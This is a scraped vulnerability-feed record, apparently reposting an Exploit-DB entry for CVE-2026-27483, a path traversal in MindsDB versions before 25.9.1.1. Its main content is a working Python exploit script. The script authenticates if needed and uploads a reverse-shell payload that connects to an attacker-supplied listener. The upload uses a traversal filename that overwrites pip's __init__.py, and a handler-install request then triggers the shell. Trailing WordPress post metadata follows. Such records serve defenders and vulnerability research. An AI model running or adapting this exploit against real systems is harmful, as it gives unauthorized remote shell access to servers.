{“lastseen”:”2026-05-04T17:27:58″,”description”:”Exploit Title: MindsDB 25.9.1.1 – Path Traversal Date: 06-03-2026 Exploit Author: Lohitya Pushkar thewhiteh4t Vendor Homepage: https:\/\/mindsdb.com\/ Software Link: https:\/\/github.com\/mindsdb\/mindsdb Version: not installed handlers BANNER = \\”\\”\\”…”,”published”:”2026-05-04T00:00:00″,”modified”:”2026-05-04T00:00:00″,”type”:”exploitdb”,”title”:”MindsDB 25.9.1.1 – Path Traversal”,”source”:””,”references”:””,”id”:”EDB-ID:52547″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-27483″],”sourceData”:”# Exploit Title: MindsDB 25.9.1.1 – Path Traversal \\r\\n# Date: 06-03-2026\\r\\n# Exploit Author: Lohitya Pushkar (thewhiteh4t)\\r\\n# Vendor Homepage: https:\/\/mindsdb.com\/\\r\\n# Software Link: https:\/\/github.com\/mindsdb\/mindsdb\\r\\n# Version: \\u003c 25.9.1.1\\r\\n# Tested on: Arch Linux\\r\\n# CVE : CVE-2026-27483\\r\\n# Original Advisory: https:\/\/github.com\/mindsdb\/mindsdb\/security\/advisories\/GHSA-4894-xqv6-vrfq\\r\\n# Vulnerability Discovery: XlabAITeam\\r\\n\\r\\nimport argparse\\r\\nimport random\\r\\nimport re\\r\\nimport string\\r\\nimport sys\\r\\n\\r\\nimport requests\\r\\nfrom packaging.version import Version\\r\\n\\r\\nPIP_PATH = \\”..\/..\/..\/..\/..\/..\/venv\/lib\/python3.10\/site-packages\/pip\/__init__.py\\”\\r\\nHANDLER = \\”anomaly_detection\\” # query \/api\/handlers\/ -\\u003e not installed handlers\\r\\n\\r\\nBANNER = \\”\\”\\”\\r\\n————————————-\\r\\n— CVE-2026-27483 ——————\\r\\n— MindsDB Path Traversal to RCE —\\r\\n————————————-\\r\\n\\r\\n[\\u003e] Found By : XlabAITeam\\r\\n[\\u003e] PoC By : Lohitya Pushkar (thewhiteh4t)\\r\\n\\”\\”\\”\\r\\n\\r\\ntry:\\r\\n parser = argparse.ArgumentParser()\\r\\n parser.add_argument(\\”-rh\\”, default=\\”127.0.0.1\\”, help=\\”Target host\\”)\\r\\n parser.add_argument(\\”-rp\\”, default=\\”47334\\”, help=\\”Target port\\”)\\r\\n parser.add_argument(\\”-lh\\”, help=\\”Listener host\\”)\\r\\n parser.add_argument(\\”-lp\\”, default=\\”4444\\”, help=\\”Listener port\\”)\\r\\n parser.add_argument(\\”-u\\”, help=\\”Username\\”)\\r\\n parser.add_argument(\\”-p\\”, help=\\”Password\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n rhost = args.rh\\r\\n rport = args.rp\\r\\n lhost = args.lh\\r\\n lport = args.lp\\r\\n user = args.u\\r\\n pswd = args.p\\r\\n\\r\\n base_url = f\\”http:\/\/{rhost}:{rport}\\”\\r\\n\\r\\n print(BANNER)\\r\\n print(f\\”[\\u003e] Target : {base_url}\\”)\\r\\n print(f\\”[\\u003e] LHOST : {lhost}\\”)\\r\\n print(f\\”[\\u003e] LPORT : {lport}\\\\n\\”)\\r\\n\\r\\n def login(username, password):\\r\\n r = requests.post(\\r\\n f\\”{base_url}\/api\/login\\”, json={\\”username\\”: username, \\”password\\”: password}\\r\\n )\\r\\n if r.status_code == 200 and \\”token\\” in r.text:\\r\\n token = r.json().get(\\”token\\”)\\r\\n print(\\”[+] Login successful!\\”)\\r\\n return token\\r\\n print(\\”[!] Login failed : \\”, r.status_code)\\r\\n print(f\\”—\\\\n{r.text}\\\\n—\\”)\\r\\n return None\\r\\n\\r\\n print(\\”[*] Checking status…\\\\n\\”)\\r\\n r = requests.get(f\\”{base_url}\/api\/status\\”)\\r\\n\\r\\n if r.status_code != 200:\\r\\n print(\\”[-] Status code :\\”, r.status_code)\\r\\n print(f\\”—\\\\n{r.text}\\\\n—\\”)\\r\\n sys.exit()\\r\\n\\r\\n status_json = r.json()\\r\\n ver = status_json[\\”mindsdb_version\\”]\\r\\n auth = status_json[\\”auth\\”][\\”http_auth_enabled\\”]\\r\\n\\r\\n print(f\\”[*] MindsDB Version : {ver}\\”)\\r\\n auth_headers = {}\\r\\n\\r\\n ver_clean = Version(re.sub(r\\”[a-zA-Z].*$\\”, \\”\\”, ver))\\r\\n if ver_clean \\u003c Version(\\”25.4.1.0\\”):\\r\\n print(\\r\\n f\\”[!] Version {ver} \\u003c 25.4.1.0 \u2014 may use Python 3.8\/3.9, PoC targets 3.10, manually edit PIP_PATH and try again.\\”\\r\\n )\\r\\n sys.exit(0)\\r\\n if ver_clean \\u003e= Version(\\”25.9.1.1\\”):\\r\\n print(f\\”[!] Version {ver} is patched (\\u003e= 25.9.1.1). Aborting.\\”)\\r\\n sys.exit(0)\\r\\n\\r\\n if auth:\\r\\n if not user or not pswd:\\r\\n print(\\”[!] Auth is enabled. Provide –username and –password.\\”)\\r\\n sys.exit()\\r\\n token = login(user, pswd)\\r\\n if not token:\\r\\n sys.exit()\\r\\n auth_headers = {\\”Authorization\\”: f\\”Bearer {token}\\”}\\r\\n else:\\r\\n print(\\”[*] Auth disabled \u2014 proceeding unauthenticated\\”)\\r\\n\\r\\n shell_pl = f”’#!\/usr\/bin\/env python3\\r\\n\\r\\nimport os,pty,socket\\r\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\r\\ns.connect((\\”{lhost.strip()}\\”,{lport.strip()}))\\r\\nos.dup2(s.fileno(),0)\\r\\nos.dup2(s.fileno(),1)\\r\\nos.dup2(s.fileno(),2)\\r\\npty.spawn(\\”\/bin\/sh\\”)\\r\\n”’.replace(\\”\\\\n\\”, \\”\\\\r\\\\n\\”)\\r\\n\\r\\n fname = \\”\\”.join(random.choices(string.ascii_lowercase, k=8))\\r\\n\\r\\n payload = {\\”name\\”: fname, \\”source\\”: fname, \\”source_type\\”: \\”file\\”}\\r\\n\\r\\n infile = {\\”file\\”: (PIP_PATH, shell_pl, \\”text\/plain\\”)}\\r\\n\\r\\n print(\\”[*] Uploading payload :\\”, fname)\\r\\n pr = requests.put(\\r\\n f\\”{base_url}\/api\/files\/{fname}\\”,\\r\\n data=payload,\\r\\n files=infile,\\r\\n headers=auth_headers,\\r\\n )\\r\\n\\r\\n if pr.status_code == 400:\\r\\n print(\\”[+] Payload uploaded!\\”)\\r\\n else:\\r\\n print(\\”[-] Payload upload request :\\”, pr.status_code)\\r\\n print(f\\”—\\\\n{pr.text}\\\\n—\\”)\\r\\n sys.exit()\\r\\n\\r\\n print(\\”[*] Triggering payload…\\”)\\r\\n r = requests.post(\\r\\n f\\”{base_url}\/api\/handlers\/{HANDLER}\/install\\”, json={}, headers=auth_headers\\r\\n )\\r\\n\\r\\nexcept Exception as exc:\\r\\n print(\\”[-] Exception :\\”, exc)\\r\\nexcept KeyboardInterrupt:\\r\\n sys.exit()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52547″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52547″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-04T17:27:58″,”description”:”Exploit Title: MindsDB 25.9.1.1 – Path Traversal Date: 06-03-2026 Exploit Author: Lohitya Pushkar thewhiteh4t Vendor Homepage: https:\/\/mindsdb.com\/ Software Link: https:\/\/github.com\/mindsdb\/mindsdb Version: not installed handlers BANNER…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,40,15,13,7,11,5],"class_list":["post-51285","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n